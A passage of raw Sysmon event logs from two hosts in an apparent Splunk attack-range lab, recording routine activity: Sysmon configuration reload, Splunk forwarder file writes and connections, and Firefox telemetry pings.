Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:32.009{466BC892-F4C0-60EB-357D-00000000CF01}9832C:\Program Files\ansible\sysmon\Sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-Sysmon64.exe -c C:\Program Files\ansible\sysmon\ATTACKRANGE\Administrator{466BC892-F49A-60EB-D4CC-F90400000000}0x4f9ccd43HighMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 23542300x80000000000000001048948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:33.556{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB6F941B59D9F7AC2E1020CAB6E5177A,SHA256=76BB53234D2370814A2894204EA98B12BEFC0A9B02FDCE869BE46E382BF3BE08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807649Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:33.288{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45803EB7FEF30E017866FC2E13E33671,SHA256=83B5B9BBA7963CD1EE97BED38213F0730A3DF945129E2B7428264CD672C61748,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:33.020{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=73179C9BA02E8C58340C323FE61FA6AD,SHA256=A3028DB1E19215F04DD254A2FEF19B2D30DB79B5135FEAE673CAB3FB88D7C471,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:33.020{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50CFF4EC02B6203CB7198A0A22D4E307,SHA256=9E75E42E23106A254D05E1CB6221696996C713F8BA3C4F19F63D0B0C7104B461,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:25.801{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51026-false10.0.1.12-8000- 23542300x80000000000000001048949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:34.572{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2328325E34854A2C46454686890F9E87,SHA256=17DC8DAACD919F842C817563512D357AF47EE9B512B436A7F947B8218A800A4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807651Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:34.318{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9D0BCAF977E448D18D4FB9B81DB8D8E,SHA256=E0460C7F8DC1A683FAFDD4F73CAF09CF686E3E5786D49B424074AA0E05AECF9B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807650Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:32.248{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57268-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:35.586{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A57410378C882CFF04FC46C5DA660A57,SHA256=9ACCC467ED570A4177077D3B57F1CA1DFEC1E9B009ACE60000B069333DB811E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807652Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:35.334{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38F30DA1F9268E78264E169769768CD3,SHA256=8AC96768DDF58B0F3ED4900F0110FB5C07E90F1C48D206D247B48859D93466CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:36.601{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09441381AFF44DE74878362B2C9A87D8,SHA256=24E21F6387B59AAB1871E8E0E1D4EDAF42A8396DAAB4FE09D4B3CE0CE493FC95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807653Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:36.381{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4B7F1579094687D7D567FB0B01BDBE5,SHA256=BCC4610EF0529AC52BB2D1CACE5AD2BE5E4E603E37CE1D3FFD6C8A08900C62B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:37.601{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C25B1DFDB9FCD98371CAED663584D39,SHA256=B824ED532F638DC64F0886FB5F7CEB7AF5C5A3DA18ECDDBCBB32815AD0864B30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807654Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:37.396{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36237E17A116310C3C8AB20947B4C65F,SHA256=6AA363DB318AB30F52B964ECFCF01AB8BC5D404C36C90CCE1FCF1ADDF97B16B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:38.634{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F91F179492DA45599BB6C2B7EAB9578,SHA256=FA14948006DC83A16BA6293F3DCFE52D53B8B466D87534987926705B9172AB48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807655Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:38.396{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1117322D95BDEE7BCB71DC43FF3F936F,SHA256=1892930012CF93C1A79A88766631062B71ED2E72D02E460A5595E90156E3C3FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:38.532{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=6A270DA360F186BD054824654D53D6B0,SHA256=6CF8063193538C5BBFF20BADC21B34D718FC7B60D7F434FBC360AB3A3672CB78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:39.668{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B936F49C112C5C4FE28B96B89723DD9,SHA256=790FBB60E3A66F63D6683737F879532ED0EDFC2C88CACCDBACCD4B31EF8C70AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807656Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:39.412{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82612FA0914D63810D27C779D6BA031B,SHA256=C57828721F39915D9827562E222D90CBE4919B0741BC29950887234CC4C9D35B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:31.797{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51027-false10.0.1.12-8000- 23542300x80000000000000001048958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:40.699{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28EE782CCCD1ACC2CE6E9F61A631FFAD,SHA256=D5376A4C6178EBFBED86FFBB6F4C482377BB77F255DD18AB97A590A3933B8026,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807658Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:40.443{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAD7FD5EB9522D3EED3DAD55DF9E6B86,SHA256=211907A7142083CE44665945527FCDAF290DE349453687822085FC3CEC74DB60,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807657Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:38.247{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57269-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:41.715{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1263961E677D3FA9791E3ADD4166BF86,SHA256=93A77D433C9DCD845A500B8018398ACF6DCA33AA8662D6D682622029B0052E9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807659Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:41.505{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA0FDB74238E639C5F1E62EAA1FE8820,SHA256=17F14E0D435C66C0D5539ADE3E809FD3F97259BB1F862C21DA6C4F7922EC243C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.985{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F4CA-60EB-377D-00000000CF01}6724C:\Program Files\Mozilla Firefox\pingsender.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.985{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F4CA-60EB-377D-00000000CF01}6724C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.953{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F4CA-60EB-387D-00000000CF01}9232C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.953{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F4CA-60EB-387D-00000000CF01}9232C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.938{466BC892-F4CA-60EB-387D-00000000CF01}92324384C:\Windows\system32\conhost.exe{466BC892-F4CA-60EB-377D-00000000CF01}6724C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.938{466BC892-0664-60E8-6503-00000000CF01}40242236C:\Windows\system32\csrss.exe{466BC892-F4CA-60EB-387D-00000000CF01}9232C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.936{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.935{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.935{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.935{466BC892-0664-60E8-6503-00000000CF01}40242236C:\Windows\system32\csrss.exe{466BC892-F4CA-60EB-377D-00000000CF01}6724C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.935{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.935{466BC892-F4CA-60EB-367D-00000000CF01}75207904C:\Program Files\Mozilla Firefox\default-browser-agent.exe{466BC892-F4CA-60EB-377D-00000000CF01}6724C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Mozilla Firefox\default-browser-agent.exe+36236|C:\Program Files\Mozilla Firefox\default-browser-agent.exe+38617|C:\Program Files\Mozilla Firefox\default-browser-agent.exe+68438|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.934{466BC892-F4CA-60EB-377D-00000000CF01}6724C:\Program Files\Mozilla Firefox\pingsender.exe89.0.2-FirefoxMozilla Foundationpingsender.exe"C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/default-browser-agent/default-browser/1/0460A459-2B40-4601-917A-1BE137E24F51 "C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Pending Pings\0460A459-2B40-4601-917A-1BE137E24F51"C:\Windows\system32\ATTACKRANGE\Administrator{466BC892-0667-60E8-D79D-240000000000}0x249dd72HighMD5=137DDE1BDB39C075B053CE5D9B7E6128,SHA256=E742ED8B37CB571059AAE1DA272F1821D1AD3D9855CBB7ABA98DCFA0260ACA28,IMPHASH=AF27FA7223A9B6FE80447A0E6715E632{466BC892-F4CA-60EB-367D-00000000CF01}7520C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task "308046B0AF4A39CB" 10341000x80000000000000001048976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.915{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F4CA-60EB-367D-00000000CF01}7520C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.915{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F4CA-60EB-367D-00000000CF01}7520C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.915{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4CA-60EB-367D-00000000CF01}7520C:\Program Files\Mozilla 